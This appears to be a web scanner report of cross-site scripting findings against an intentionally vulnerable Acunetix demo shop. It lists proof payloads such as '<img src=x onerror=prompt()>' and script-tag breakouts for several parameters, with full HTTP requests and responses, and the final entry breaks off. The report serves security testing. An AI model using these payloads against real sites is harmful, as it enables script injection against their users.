URL | http://testphp.vulnweb.com/listproducts.php?artist=%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E |
Method | GET |
Parameter | artist |
Attack | <img src=x onerror=prompt()> |
Evidence | <img src=x onerror=prompt()> |
Request Header - size: 336 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?artist=%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/artists.php?artist=3 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:25:43 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5004 |
Response Body - size: 5,004 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '=<img src=x onerror=prompt()>' at line 1 Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74 </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/listproducts.php?cat=%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E |
Method | GET |
Parameter | cat |
Attack | <img src=x onerror=prompt()> |
Evidence | <img src=x onerror=prompt()> |
Request Header - size: 327 bytes. |
GET http://testphp.vulnweb.com/listproducts.php?cat=%3Cimg+src%3Dx+onerror%3Dprompt%28%29%3E HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/categories.php |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:25:43 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5004 |
Response Body - size: 5,004 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>pictures</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '=<img src=x onerror=prompt()>' at line 1 Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74 </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/guestbook.php |
Method | POST |
Parameter | name |
Attack | </strong><scrIpt>alert(1);</scRipt><strong> |
Evidence | </strong><scrIpt>alert(1);</scRipt><strong> |
Request Header - size: 518 bytes. |
POST http://testphp.vulnweb.com/guestbook.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 107 Origin: http://testphp.vulnweb.com Connection: keep-alive Referer: http://testphp.vulnweb.com/guestbook.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 107 bytes. |
name=%3C%2Fstrong%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3Cstrong%3E&text=oQfJZHNE&submit=add+message
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:25:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5441 |
Response Body - size: 5,441 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>guestbook</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <table width="100%" cellpadding="4" cellspacing="1"><tr><td colspan="2"><h2>Our guestbook</h2></td></tr><tr><td align="left" valign="middle" style="background-color:#F5F5F5"><strong></strong><scrIpt>alert(1);</scRipt><strong></strong></td><td align="right" style="background-color:#F5F5F5">12.13.2022, 4:25 am</td></tr><tr><td colspan="2"><img src="/images/remark.gif"> oQfJZHNE</td></tr></table> </div> <div class="story"> <form action="" method="post" name="faddentry"> <input type="hidden" name="name" value="anonymous user"> <textarea name="text" rows="5" wrap="VIRTUAL" style="width:500px;"></textarea> <br> <input type="submit" name="submit" value="add message"> </form> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/guestbook.php |
Method | POST |
Parameter | text |
Attack | </td><scrIpt>alert(1);</scRipt><td> |
Evidence | </td><scrIpt>alert(1);</scRipt><td> |
Request Header - size: 518 bytes. |
POST http://testphp.vulnweb.com/guestbook.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 105 Origin: http://testphp.vulnweb.com Connection: keep-alive Referer: http://testphp.vulnweb.com/guestbook.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 105 bytes. |
name=anonymous+user&text=%3C%2Ftd%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3Ctd%3E&submit=add+message
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:25:21 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5439 |
Response Body - size: 5,439 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>guestbook</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <table width="100%" cellpadding="4" cellspacing="1"><tr><td colspan="2"><h2>Our guestbook</h2></td></tr><tr><td align="left" valign="middle" style="background-color:#F5F5F5"><strong>anonymous user</strong></td><td align="right" style="background-color:#F5F5F5">12.13.2022, 4:25 am</td></tr><tr><td colspan="2"><img src="/images/remark.gif"> </td><scrIpt>alert(1);</scRipt><td></td></tr></table> </div> <div class="story"> <form action="" method="post" name="faddentry"> <input type="hidden" name="name" value="anonymous user"> <textarea name="text" rows="5" wrap="VIRTUAL" style="width:500px;"></textarea> <br> <input type="submit" name="submit" value="add message"> </form> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/search.php?test=query |
Method | POST |
Parameter | searchFor |
Attack | </h2><scrIpt>alert(1);</scRipt><h2> |
Evidence | </h2><scrIpt>alert(1);</scRipt><h2> |
Request Header - size: 342 bytes. |
POST http://testphp.vulnweb.com/search.php?test=query HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testphp.vulnweb.com Content-Length: 83 |
Request Body - size: 83 bytes. |
searchFor=%3C%2Fh2%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3Ch2%3E&goButton=go
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:25:25 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4804 |
Response Body - size: 4,804 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>search</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>searched for: </h2><scrIpt>alert(1);</scRipt><h2></h2></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/secured/newuser.php |
Method | POST |
Parameter | uaddress |
Attack | </li><scrIpt>alert(1);</scRipt><li> |
Evidence | </li><scrIpt>alert(1);</scRipt><li> |
Request Header - size: 521 bytes. |
POST http://testphp.vulnweb.com/secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 176 Origin: http://testphp.vulnweb.com Connection: keep-alive Referer: http://testphp.vulnweb.com/signup.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 176 bytes. |
uuname=akpnUdBu&upass=&upass2=&urname=DsYmcvRO&ucc=VVsNLaLW&uemail=RgLhBYOF&uphone=vkKtDSbY&uaddress=%3C%2Fli%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3Cli%3E&signup=signup
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:25:31 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 790 |
Response Body - size: 790 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title>add new user</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <div id="masthead"> <h1 id="siteName">ACUNETIX ART</h1> </div> <div id="content"> <p>You have been introduced to our database with the above informations:</p><ul><li>Username: akpnUdBu</li><li>Password: </li><li>Name: DsYmcvRO</li><li>Address: </li><scrIpt>alert(1);</scRipt><li></li><li>E-Mail: RgLhBYOF</li><li>Phone number: vkKtDSbY</li><li>Credit card: VVsNLaLW</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div> </body> </html> |
URL | http://testphp.vulnweb.com/secured/newuser.php |
Method | POST |
Parameter | ucc |
Attack | </li><scrIpt>alert(1);</scRipt><li> |
Evidence | </li><scrIpt>alert(1);</scRipt><li> |
Request Header - size: 521 bytes. |
POST http://testphp.vulnweb.com/secured/newuser.php HTTP/1.1
